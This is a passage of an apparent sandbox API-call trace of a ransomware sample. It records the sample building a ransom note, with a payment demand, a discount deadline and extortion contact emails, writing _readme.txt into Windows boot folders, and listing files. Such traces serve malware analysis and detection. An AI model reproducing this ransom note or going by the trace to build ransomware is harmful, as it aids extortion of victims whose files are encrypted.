lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0093.911] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0093.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0093.911] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0093.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0093.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0093.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0093.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0093.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0093.912] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0093.912] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0093.913] CloseHandle (hObject=0x5c8) returned 1 [0093.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0093.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0093.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0093.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.913] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1859040, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1859040, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0093.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.913] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1859040, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1859040, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.914] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.914] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1859040, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1859040, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1859040, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.914] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1859040, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1859040, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1859040, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.914] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0093.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0093.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0093.914] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0093.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.915] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0093.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.916] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.916] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.916] PathFindFileNameW (pszPath="") returned="" [0093.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.916] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.917] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0093.917] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0093.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.917] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.917] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0093.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.917] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0093.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0093.918] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0093.919] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0093.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0093.919] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0093.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0093.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0093.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0093.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0093.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0093.921] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption 